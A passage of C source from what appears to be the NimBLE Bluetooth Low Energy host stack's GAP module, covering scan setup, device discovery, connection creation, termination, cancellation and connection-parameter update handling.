uncoded_params->scan_type; params->itvl = htole16(uncoded_params->scan_itvl); params->window = htole16(uncoded_params->scan_window); len += sizeof(*params); params++; } if (coded_params) { cmd->phys |= BLE_HCI_LE_PHY_CODED_PREF_MASK; params->type = coded_params->scan_type; params->itvl = htole16(coded_params->scan_itvl); params->window = htole16(coded_params->scan_window); len += sizeof(*params); params++; } if (!cmd->phys) { return BLE_ERR_INV_HCI_CMD_PARMS; } return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_SCAN_PARAM), cmd, len, NULL, 0); } static int ble_gap_ext_disc_enable_tx(uint8_t enable, uint8_t filter_duplicates, uint16_t duration, uint16_t period) { struct ble_hci_le_set_ext_scan_enable_cp cmd; cmd.enable = enable; cmd.filter_dup = filter_duplicates; cmd.duration = htole16(duration); cmd.period = htole16(period); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_SCAN_ENABLE), &cmd, sizeof(cmd), NULL, 0); } #endif #endif #if NIMBLE_BLE_SCAN #if !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_disc_enable_tx(int enable, int filter_duplicates) { struct ble_hci_le_set_scan_enable_cp cmd; uint16_t opcode; cmd.enable = !!enable; cmd.filter_duplicates = !!filter_duplicates; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_ENABLE); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_disc_tx_params(uint8_t own_addr_type, const struct ble_gap_disc_params *disc_params) { struct ble_hci_le_set_scan_params_cp cmd; uint16_t opcode; if (disc_params->passive) { cmd.scan_type = BLE_HCI_SCAN_TYPE_PASSIVE; } else { cmd.scan_type = BLE_HCI_SCAN_TYPE_ACTIVE; } cmd.scan_itvl = htole16(disc_params->itvl); cmd.scan_window = htole16(disc_params->window); cmd.own_addr_type = own_addr_type; cmd.filter_policy = disc_params->filter_policy; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_PARAMS); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } #endif static int ble_gap_disc_disable_tx(void) { #if MYNEWT_VAL(BLE_EXT_ADV) return ble_gap_ext_disc_enable_tx(0, 0, 0, 0); #else return ble_gap_disc_enable_tx(0, 0); #endif } static int ble_gap_disc_cancel_no_lock(void) { int rc; STATS_INC(ble_gap_stats, discover_cancel); if (!ble_gap_disc_active()) { rc = BLE_HS_EALREADY; goto done; } rc = ble_gap_disc_disable_tx(); if (rc != 0) { goto done; } ble_gap_master_reset_state(); done: if (rc != 0) { STATS_INC(ble_gap_stats, discover_cancel_fail); } return rc; } #endif int ble_gap_disc_cancel(void) { #if NIMBLE_BLE_SCAN int rc; ble_hs_lock(); rc = ble_gap_disc_cancel_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } #if NIMBLE_BLE_SCAN static int ble_gap_disc_ext_validate(uint8_t own_addr_type) { if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } if (ble_gap_conn_active()) { return BLE_HS_EBUSY; } if (ble_gap_disc_active()) { return BLE_HS_EALREADY; } if (!ble_hs_is_enabled()) { return BLE_HS_EDISABLED; } if (ble_gap_is_preempted()) { return BLE_HS_EPREEMPTED; } return 0; } #endif #if MYNEWT_VAL(BLE_EXT_ADV) && NIMBLE_BLE_SCAN static void ble_gap_ext_disc_fill_dflts(uint8_t limited, struct ble_hs_hci_ext_scan_param *disc_params) { if (disc_params->scan_itvl == 0) { if (limited) { disc_params->scan_itvl = BLE_GAP_LIM_DISC_SCAN_INT; } else { disc_params->scan_itvl = BLE_GAP_SCAN_FAST_INTERVAL_MIN; } } if (disc_params->scan_window == 0) { if (limited) { disc_params->scan_window = BLE_GAP_LIM_DISC_SCAN_WINDOW; } else { disc_params->scan_window = BLE_GAP_SCAN_FAST_WINDOW; } } } static void ble_gap_ext_scan_params_to_hci(const struct ble_gap_ext_disc_params *params, struct ble_hs_hci_ext_scan_param *hci_params) { memset(hci_params, 0, sizeof(*hci_params)); if (params->passive) { hci_params->scan_type = BLE_HCI_SCAN_TYPE_PASSIVE; } else { hci_params->scan_type = BLE_HCI_SCAN_TYPE_ACTIVE; } hci_params->scan_itvl = params->itvl; hci_params->scan_window = params->window; } #endif int ble_gap_ext_disc(uint8_t own_addr_type, uint16_t duration, uint16_t period, uint8_t filter_duplicates, uint8_t filter_policy, uint8_t limited, const struct ble_gap_ext_disc_params *uncoded_params, const struct ble_gap_ext_disc_params *coded_params, ble_gap_event_fn *cb, void *cb_arg) { #if NIMBLE_BLE_SCAN && MYNEWT_VAL(BLE_EXT_ADV) struct ble_hs_hci_ext_scan_param ucp; struct ble_hs_hci_ext_scan_param cp; int rc; STATS_INC(ble_gap_stats, discover); ble_hs_lock(); rc = ble_gap_disc_ext_validate(own_addr_type); if (rc != 0) { goto done; } /* Make a copy of the parameter structure and fill unspecified values with * defaults. */ if (uncoded_params) { ble_gap_ext_scan_params_to_hci(uncoded_params, &ucp); ble_gap_ext_disc_fill_dflts(limited, &ucp); /* XXX: We should do it only once */ if (!uncoded_params->passive) { rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } } } if (coded_params) { ble_gap_ext_scan_params_to_hci(coded_params, &cp); ble_gap_ext_disc_fill_dflts(limited, &cp); /* XXX: We should do it only once */ if (!coded_params->passive) { rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } } } ble_gap_master.disc.limited = limited; ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; rc = ble_gap_ext_disc_tx_params(own_addr_type, filter_policy, uncoded_params ? &ucp : NULL, coded_params ? &cp : NULL); if (rc != 0) { goto done; } ble_gap_master.op = BLE_GAP_OP_M_DISC; rc = ble_gap_ext_disc_enable_tx(1, filter_duplicates, duration, period); if (rc != 0) { ble_gap_master_reset_state(); goto done; } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, discover_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_disc_fill_dflts(struct ble_gap_disc_params *disc_params) { if (disc_params->itvl == 0) { if (disc_params->limited) { disc_params->itvl = BLE_GAP_LIM_DISC_SCAN_INT; } else { disc_params->itvl = BLE_GAP_SCAN_FAST_INTERVAL_MIN; } } if (disc_params->window == 0) { if (disc_params->limited) { disc_params->window = BLE_GAP_LIM_DISC_SCAN_WINDOW; } else { disc_params->window = BLE_GAP_SCAN_FAST_WINDOW; } } } static int ble_gap_disc_validate(uint8_t own_addr_type, const struct ble_gap_disc_params *disc_params) { if (disc_params == NULL) { return BLE_HS_EINVAL; } /* Check interval and window */ if ((disc_params->itvl < BLE_HCI_SCAN_ITVL_MIN) || (disc_params->itvl > BLE_HCI_SCAN_ITVL_MAX) || (disc_params->window < BLE_HCI_SCAN_WINDOW_MIN) || (disc_params->window > BLE_HCI_SCAN_WINDOW_MAX) || (disc_params->itvl < disc_params->window)) { return BLE_HS_EINVAL; } /* Check scanner filter policy */ if (disc_params->filter_policy > BLE_HCI_SCAN_FILT_MAX) { return BLE_HS_EINVAL; } return ble_gap_disc_ext_validate(own_addr_type); } #endif int ble_gap_disc(uint8_t own_addr_type, int32_t duration_ms, const struct ble_gap_disc_params *disc_params, ble_gap_event_fn *cb, void *cb_arg) { #if NIMBLE_BLE_SCAN #if MYNEWT_VAL(BLE_EXT_ADV) struct ble_gap_ext_disc_params p = {0}; p.itvl = disc_params->itvl; p.passive = disc_params->passive; p.window = disc_params->window; if (duration_ms == BLE_HS_FOREVER) { duration_ms = 0; } else if (duration_ms == 0) { duration_ms = BLE_GAP_DISC_DUR_DFLT; } return ble_gap_ext_disc(own_addr_type, duration_ms/10, 0, disc_params->filter_duplicates, disc_params->filter_policy, disc_params->limited, &p, NULL, cb, cb_arg); #else struct ble_gap_disc_params params; uint32_t duration_ticks = 0; int rc; STATS_INC(ble_gap_stats, discover); ble_hs_lock(); /* Make a copy of the parameter strcuture and fill unspecified values with * defaults. */ params = *disc_params; ble_gap_disc_fill_dflts(&params); rc = ble_gap_disc_validate(own_addr_type, &params); if (rc != 0) { goto done; } if (duration_ms == 0) { duration_ms = BLE_GAP_DISC_DUR_DFLT; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } if (!params.passive) { rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } } ble_gap_master.disc.limited = params.limited; ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; BLE_HS_LOG(INFO, "GAP procedure initiated: discovery; "); ble_gap_log_disc(own_addr_type, duration_ms, &params); BLE_HS_LOG(INFO, "\n"); rc = ble_gap_disc_tx_params(own_addr_type, &params); if (rc != 0) { goto done; } ble_gap_master.op = BLE_GAP_OP_M_DISC; rc = ble_gap_disc_enable_tx(1, params.filter_duplicates); if (rc != 0) { ble_gap_master_reset_state(); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_master_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, discover_fail); } return rc; #endif #else return BLE_HS_ENOTSUP; #endif } int ble_gap_disc_active(void) { /* Assume read is atomic; mutex not necessary. */ return ble_gap_master.op == BLE_GAP_OP_M_DISC; } #if MYNEWT_VAL(BLE_ROLE_CENTRAL) && !MYNEWT_VAL(BLE_EXT_ADV) /***************************************************************************** * $connection establishment procedures * *****************************************************************************/ static int ble_gap_conn_create_tx(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_conn_params *params) { struct ble_hci_le_create_conn_cp cmd; uint16_t opcode; cmd.scan_itvl = htole16(params->scan_itvl); cmd.scan_window = htole16(params->scan_window); if (peer_addr == NULL) { /* Application wants to connect to any device in the white list. The * peer address type and peer address fields are ignored by the * controller; fill them with dummy values. */ cmd.filter_policy = BLE_HCI_CONN_FILT_USE_WL; cmd.peer_addr_type = 0; memset(cmd.peer_addr, 0, sizeof(cmd.peer_addr)); } else { cmd.filter_policy = BLE_HCI_CONN_FILT_NO_WL; cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, sizeof(cmd.peer_addr)); } cmd.own_addr_type = own_addr_type; cmd.min_conn_itvl = htole16(params->itvl_min); cmd.max_conn_itvl = htole16(params->itvl_max); cmd.conn_latency = htole16(params->latency); cmd.tmo = htole16(params->supervision_timeout); cmd.min_ce = htole16(params->min_ce_len); cmd.max_ce = htole16(params->max_ce_len); opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CREATE_CONN); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } #endif #if MYNEWT_VAL(BLE_EXT_ADV) #if MYNEWT_VAL(BLE_ROLE_CENTRAL) static int ble_gap_check_conn_params(uint8_t phy, const struct ble_gap_conn_params *params) { if (phy != BLE_HCI_LE_PHY_2M) { /* Check scan interval and window */ if ((params->scan_itvl < BLE_HCI_SCAN_ITVL_MIN) || (params->scan_itvl > BLE_HCI_SCAN_ITVL_MAX) || (params->scan_window < BLE_HCI_SCAN_WINDOW_MIN) || (params->scan_window > BLE_HCI_SCAN_WINDOW_MAX) || (params->scan_itvl < params->scan_window)) { return BLE_ERR_INV_HCI_CMD_PARMS; } } /* Check connection interval min */ if ((params->itvl_min < BLE_HCI_CONN_ITVL_MIN) || (params->itvl_min > BLE_HCI_CONN_ITVL_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection interval max */ if ((params->itvl_max < BLE_HCI_CONN_ITVL_MIN) || (params->itvl_max > BLE_HCI_CONN_ITVL_MAX) || (params->itvl_max < params->itvl_min)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection latency */ if ((params->latency < BLE_HCI_CONN_LATENCY_MIN) || (params->latency > BLE_HCI_CONN_LATENCY_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check supervision timeout */ if ((params->supervision_timeout < BLE_HCI_CONN_SPVN_TIMEOUT_MIN) || (params->supervision_timeout > BLE_HCI_CONN_SPVN_TIMEOUT_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection event length */ if (params->min_ce_len > params->max_ce_len) { return BLE_ERR_INV_HCI_CMD_PARMS; } return 0; } static int ble_gap_ext_conn_create_tx( uint8_t own_addr_type, const ble_addr_t *peer_addr, uint8_t phy_mask, const struct ble_gap_conn_params *phy_1m_conn_params, const struct ble_gap_conn_params *phy_2m_conn_params, const struct ble_gap_conn_params *phy_coded_conn_params) { struct ble_hci_le_ext_create_conn_cp *cmd; struct conn_params *params; uint8_t buf[sizeof(*cmd) + 3 * sizeof(*params)]; uint8_t len = sizeof(*cmd); int rc; /* Check own addr type */ if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (phy_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd = (void *) buf; params = cmd->conn_params; if (peer_addr == NULL) { /* Application wants to connect to any device in the white list. The * peer address type and peer address fields are ignored by the * controller; fill them with dummy values. */ cmd->filter_policy = BLE_HCI_CONN_FILT_USE_WL; cmd->peer_addr_type = 0; memset(cmd->peer_addr, 0, sizeof(cmd->peer_addr)); } else { /* Check peer addr type */ if (peer_addr->type > BLE_HCI_CONN_PEER_ADDR_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd->filter_policy = BLE_HCI_CONN_FILT_NO_WL; cmd->peer_addr_type = peer_addr->type; memcpy(cmd->peer_addr, peer_addr->val, sizeof(cmd->peer_addr)); } cmd->own_addr_type = own_addr_type; cmd->init_phy_mask = phy_mask; if (phy_mask & BLE_GAP_LE_PHY_1M_MASK) { rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_1M, phy_1m_conn_params); if (rc) { return rc; } params->scan_itvl = htole16(phy_1m_conn_params->scan_itvl); params->scan_window = htole16(phy_1m_conn_params->scan_window); params->conn_min_itvl = htole16(phy_1m_conn_params->itvl_min); params->conn_max_itvl = htole16(phy_1m_conn_params->itvl_max); params->conn_latency = htole16(phy_1m_conn_params->latency); params->supervision_timeout = htole16(phy_1m_conn_params->supervision_timeout); params->min_ce = htole16(phy_1m_conn_params->min_ce_len); params->max_ce = htole16(phy_1m_conn_params->max_ce_len); params++; len += sizeof(*params); } if (phy_mask & BLE_GAP_LE_PHY_2M_MASK) { rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_2M, phy_2m_conn_params); if (rc) { return rc; } params->scan_itvl = htole16(phy_2m_conn_params->scan_itvl); params->scan_window = htole16(phy_2m_conn_params->scan_window); params->conn_min_itvl = htole16(phy_2m_conn_params->itvl_min); params->conn_max_itvl = htole16(phy_2m_conn_params->itvl_max); params->conn_latency = htole16(phy_2m_conn_params->latency); params->supervision_timeout = htole16(phy_2m_conn_params->supervision_timeout); params->min_ce = htole16(phy_2m_conn_params->min_ce_len); params->max_ce = htole16(phy_2m_conn_params->max_ce_len); params++; len += sizeof(*params); } if (phy_mask & BLE_GAP_LE_PHY_CODED_MASK) { rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_CODED, phy_coded_conn_params); if (rc) { return rc; } params->scan_itvl = htole16(phy_coded_conn_params->scan_itvl); params->scan_window = htole16(phy_coded_conn_params->scan_window); params->conn_min_itvl = htole16(phy_coded_conn_params->itvl_min); params->conn_max_itvl = htole16(phy_coded_conn_params->itvl_max); params->conn_latency = htole16(phy_coded_conn_params->latency); params->supervision_timeout = htole16(phy_coded_conn_params->supervision_timeout); params->min_ce = htole16(phy_coded_conn_params->min_ce_len); params->max_ce = htole16(phy_coded_conn_params->max_ce_len); params++; len += sizeof(*params); } return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_EXT_CREATE_CONN), cmd, len, NULL, 0); } #endif /** * Initiates a connect procedure. * * @param own_addr_type The type of address the stack should use for * itself during connection establishment. * o BLE_OWN_ADDR_PUBLIC * o BLE_OWN_ADDR_RANDOM * o BLE_OWN_ADDR_RPA_PUBLIC_DEFAULT * o BLE_OWN_ADDR_RPA_RANDOM_DEFAULT * @param peer_addr The address of the peer to connect to. * If this parameter is NULL, the white list * is used. * @param duration_ms The duration of the discovery procedure. * On expiration, the procedure ends and a * BLE_GAP_EVENT_DISC_COMPLETE event is * reported. Units are milliseconds. * @param phy_mask Define on which PHYs connection attempt should * be done * @param phy_1m_conn_params Additional arguments specifying the * particulars of the connect procedure. When * BLE_GAP_LE_PHY_1M_MASK is set in phy_mask * this parameter can be specify to null for * default values. * @param phy_2m_conn_params Additional arguments specifying the * particulars of the connect procedure. When * BLE_GAP_LE_PHY_2M_MASK is set in phy_mask * this parameter can be specify to null for * default values. * @param phy_coded_conn_params Additional arguments specifying the * particulars of the connect procedure. When * BLE_GAP_LE_PHY_CODED_MASK is set in * phy_mask this parameter can be specify to * null for default values. * @param cb The callback to associate with this connect * procedure. When the connect procedure * completes, the result is reported through * this callback. If the connect procedure * succeeds, the connection inherits this * callback as its event-reporting mechanism. * @param cb_arg The optional argument to pass to the callback * function. * * @return 0 on success; * BLE_HS_EALREADY if a connection attempt is * already in progress; * BLE_HS_EBUSY if initiating a connection is not * possible because scanning is in progress; * BLE_HS_EDONE if the specified peer is already * connected; * Other nonzero on error. */ int ble_gap_ext_connect(uint8_t own_addr_type, const ble_addr_t *peer_addr, int32_t duration_ms, uint8_t phy_mask, const struct ble_gap_conn_params *phy_1m_conn_params, const struct ble_gap_conn_params *phy_2m_conn_params, const struct ble_gap_conn_params *phy_coded_conn_params, ble_gap_event_fn *cb, void *cb_arg) { #if MYNEWT_VAL(BLE_ROLE_CENTRAL) ble_npl_time_t duration_ticks; int rc; STATS_INC(ble_gap_stats, initiate); ble_hs_lock(); if (ble_gap_conn_active()) { rc = BLE_HS_EALREADY; goto done; } if (ble_gap_disc_active()) { rc = BLE_HS_EBUSY; goto done; } if (!ble_hs_is_enabled()) { return BLE_HS_EDISABLED; } if (ble_gap_is_preempted()) { rc = BLE_HS_EPREEMPTED; goto done; } if (!ble_hs_conn_can_alloc()) { rc = BLE_HS_ENOMEM; goto done; } if (peer_addr && peer_addr->type != BLE_ADDR_PUBLIC && peer_addr->type != BLE_ADDR_RANDOM && peer_addr->type != BLE_ADDR_PUBLIC_ID && peer_addr->type != BLE_ADDR_RANDOM_ID) { rc = BLE_HS_EINVAL; goto done; } if ((phy_mask & BLE_GAP_LE_PHY_1M_MASK) && phy_1m_conn_params == NULL) { phy_1m_conn_params = &ble_gap_conn_params_dflt; } if ((phy_mask & BLE_GAP_LE_PHY_2M_MASK) && phy_2m_conn_params == NULL) { phy_2m_conn_params = &ble_gap_conn_params_dflt; } if ((phy_mask & BLE_GAP_LE_PHY_CODED_MASK) && phy_coded_conn_params == NULL) { phy_coded_conn_params = &ble_gap_conn_params_dflt; } if (duration_ms == 0) { duration_ms = BLE_GAP_CONN_DUR_DFLT; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } /* Verify peer not already connected. */ if (ble_hs_conn_find_by_addr(peer_addr) != NULL) { rc = BLE_HS_EDONE; goto done; } /* XXX: Verify conn_params. */ rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; ble_gap_master.conn.using_wl = peer_addr == NULL; ble_gap_master.conn.our_addr_type = own_addr_type; ble_gap_master.op = BLE_GAP_OP_M_CONN; rc = ble_gap_ext_conn_create_tx(own_addr_type, peer_addr, phy_mask, phy_1m_conn_params, phy_2m_conn_params, phy_coded_conn_params); if (rc != 0) { ble_gap_master_reset_state(); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_master_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, initiate_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } #endif int ble_gap_connect(uint8_t own_addr_type, const ble_addr_t *peer_addr, int32_t duration_ms, const struct ble_gap_conn_params *conn_params, ble_gap_event_fn *cb, void *cb_arg) { #if MYNEWT_VAL(BLE_ROLE_CENTRAL) #if MYNEWT_VAL(BLE_EXT_ADV) return ble_gap_ext_connect(own_addr_type, peer_addr, duration_ms, BLE_GAP_LE_PHY_1M_MASK, conn_params, NULL, NULL, cb, cb_arg); #else uint32_t duration_ticks; int rc; STATS_INC(ble_gap_stats, initiate); ble_hs_lock(); if (ble_gap_conn_active()) { rc = BLE_HS_EALREADY; goto done; } if (ble_gap_disc_active()) { rc = BLE_HS_EBUSY; goto done; } if (!ble_hs_is_enabled()) { rc = BLE_HS_EDISABLED; goto done; } if (ble_gap_is_preempted()) { rc = BLE_HS_EPREEMPTED; goto done; } if (!ble_hs_conn_can_alloc()) { rc = BLE_HS_ENOMEM; goto done; } if (peer_addr && peer_addr->type != BLE_ADDR_PUBLIC && peer_addr->type != BLE_ADDR_RANDOM && peer_addr->type != BLE_ADDR_PUBLIC_ID && peer_addr->type != BLE_ADDR_RANDOM_ID) { rc = BLE_HS_EINVAL; goto done; } if (conn_params == NULL) { conn_params = &ble_gap_conn_params_dflt; } if (duration_ms == 0) { duration_ms = BLE_GAP_CONN_DUR_DFLT; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } /* Verify peer not already connected. */ if (ble_hs_conn_find_by_addr(peer_addr) != NULL) { rc = BLE_HS_EDONE; goto done; } /* XXX: Verify conn_params. */ rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: connect; "); ble_gap_log_conn(own_addr_type, peer_addr, conn_params); BLE_HS_LOG(INFO, "\n"); ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; ble_gap_master.conn.using_wl = peer_addr == NULL; ble_gap_master.conn.our_addr_type = own_addr_type; ble_gap_master.op = BLE_GAP_OP_M_CONN; rc = ble_gap_conn_create_tx(own_addr_type, peer_addr, conn_params); if (rc != 0) { ble_gap_master_reset_state(); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_master_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, initiate_fail); } return rc; #endif #else return BLE_HS_ENOTSUP; #endif } int ble_gap_conn_active(void) { /* Assume read is atomic; mutex not necessary. */ return ble_gap_master.op == BLE_GAP_OP_M_CONN; } /***************************************************************************** * $terminate connection procedure * *****************************************************************************/ int ble_gap_terminate_with_conn(struct ble_hs_conn *conn, uint8_t hci_reason) { struct ble_hci_lc_disconnect_cp cmd; int rc; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); if (conn->bhc_flags & BLE_HS_CONN_F_TERMINATING) { return BLE_HS_EALREADY; } BLE_HS_LOG(INFO, "GAP procedure initiated: terminate connection; " "conn_handle=%d hci_reason=%d\n", conn->bhc_handle, hci_reason); cmd.conn_handle = htole16(conn->bhc_handle); cmd.reason = hci_reason; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LINK_CTRL, BLE_HCI_OCF_DISCONNECT_CMD), &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { return rc; } conn->bhc_flags |= BLE_HS_CONN_F_TERMINATING; return 0; } int ble_gap_terminate(uint16_t conn_handle, uint8_t hci_reason) { struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, terminate); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn == NULL) { rc = BLE_HS_ENOTCONN; goto done; } rc = ble_gap_terminate_with_conn(conn, hci_reason); done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, terminate_fail); } return rc; } /***************************************************************************** * $cancel * *****************************************************************************/ static int ble_gap_conn_cancel_tx(void) { int rc; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CREATE_CONN_CANCEL), NULL, 0, NULL, 0); if (rc != 0) { return rc; } return 0; } #if NIMBLE_BLE_CONNECT static int ble_gap_conn_cancel_no_lock(void) { int rc; STATS_INC(ble_gap_stats, cancel); if (!ble_gap_conn_active()) { rc = BLE_HS_EALREADY; goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: cancel connection\n"); rc = ble_gap_conn_cancel_tx(); if (rc != 0) { goto done; } ble_gap_master.conn.cancel = 1; rc = 0; done: if (rc != 0) { STATS_INC(ble_gap_stats, cancel_fail); } return rc; } #endif int ble_gap_conn_cancel(void) { #if MYNEWT_VAL(BLE_ROLE_CENTRAL) int rc; ble_hs_lock(); rc = ble_gap_conn_cancel_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $update connection parameters * *****************************************************************************/ #if NIMBLE_BLE_CONNECT static struct ble_gap_update_entry * ble_gap_update_entry_alloc(void) { struct ble_gap_update_entry *entry; entry = os_memblock_get(&ble_gap_update_entry_pool); if (entry != NULL) { memset(entry, 0, sizeof *entry); } return entry; } #endif static void ble_gap_update_entry_free(struct ble_gap_update_entry *entry) { int rc; if (entry != NULL) { #if MYNEWT_VAL(BLE_HS_DEBUG) memset(entry, 0xff, sizeof *entry); #endif rc = os_memblock_put(&ble_gap_update_entry_pool, entry); BLE_HS_DBG_ASSERT_EVAL(rc == 0); } } static struct ble_gap_update_entry * ble_gap_update_entry_find(uint16_t conn_handle, struct ble_gap_update_entry **out_prev) { struct ble_gap_update_entry *entry; struct ble_gap_update_entry *prev; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); prev = NULL; SLIST_FOREACH(entry, &ble_gap_update_entries, next) { if (entry->conn_handle == conn_handle) { break; } prev = entry; } if (out_prev != NULL) { *out_prev = prev; } return entry; } static struct ble_gap_update_entry * ble_gap_update_entry_remove(uint16_t conn_handle) { struct ble_gap_update_entry *entry; struct ble_gap_update_entry *prev; entry = ble_gap_update_entry_find(conn_handle, &prev); if (entry != NULL) { if (prev == NULL) { SLIST_REMOVE_HEAD(&ble_gap_update_entries, next); } else { SLIST_NEXT(prev, next) = SLIST_NEXT(entry, next); } ble_hs_timer_resched(); } return entry; } #if NIMBLE_BLE_CONNECT static void ble_gap_update_l2cap_cb(uint16_t conn_handle, int status, void *arg) { struct ble_gap_update_entry *entry; /* Report failures and rejections. Success gets reported when the * controller sends the connection update complete event. */ ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); if (entry != NULL) { ble_gap_update_entry_free(entry); if (status != 0) { ble_gap_update_notify(conn_handle, status); } /* On success let's wait for the controller to notify about update */ } } static int ble_gap_tx_param_pos_reply(uint16_t conn_handle, struct ble_gap_upd_params *params) { struct ble_hci_le_rem_conn_param_rr_cp cmd; cmd.conn_handle = htole16(conn_handle); cmd.conn_itvl_min = htole16(params->itvl_min); cmd.conn_itvl_max = htole16(params->itvl_max); cmd.conn_latency = htole16(params->latency); cmd.supervision_timeout = htole16(params->supervision_timeout); cmd.min_ce = htole16(params->min_ce_len); cmd.max_ce = htole16(params->max_ce_len); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_CONN_PARAM_RR), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_tx_param_neg_reply(uint16_t conn_handle, uint8_t reject_reason) { struct ble_hci_le_rem_conn_params_nrr_cp cmd; cmd.conn_handle = htole16(conn_handle); cmd.reason = reject_reason; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_CONN_PARAM_NRR), &cmd, sizeof(cmd), NULL, 0); } #endif void ble_gap_rx_param_req(const struct ble_hci_ev_le_subev_rem_conn_param_req *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_upd_params peer_params; struct ble_gap_upd_params self_params; struct ble_gap_event event; uint16_t conn_handle; int rc; memset(&event, 0, sizeof event); peer_params.itvl_min = le16toh(ev->min_interval); peer_params.itvl_max = le16toh(ev->max_interval); peer_params.latency = le16toh(ev->latency); peer_params.supervision_timeout = le16toh(ev->timeout); peer_params.min_ce_len = 0; peer_params.max_ce_len = 0; /* Copy the peer params into the self params to make it easy on the * application. The application callback will change only the fields which * it finds unsuitable. */ self_params = peer_params; conn_handle = le16toh(ev->conn_handle); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONN_UPDATE_REQ; event.conn_update_req.conn_handle = conn_handle; event.conn_update_req.self_params = &self_params; event.conn_update_req.peer_params = &peer_params; rc = ble_gap_call_conn_event_cb(&event, conn_handle); if (rc == 0) { rc = ble_gap_tx_param_pos_reply(conn_handle, &self_params); if (rc != 0) { ble_gap_update_failed(conn_handle, rc); } } else { ble_gap_tx_param_neg_reply(conn_handle, rc); } #endif } #if NIMBLE_BLE_CONNECT static int ble_gap_update_tx(uint16_t conn_handle, const struct ble_gap_upd_params *params) { struct 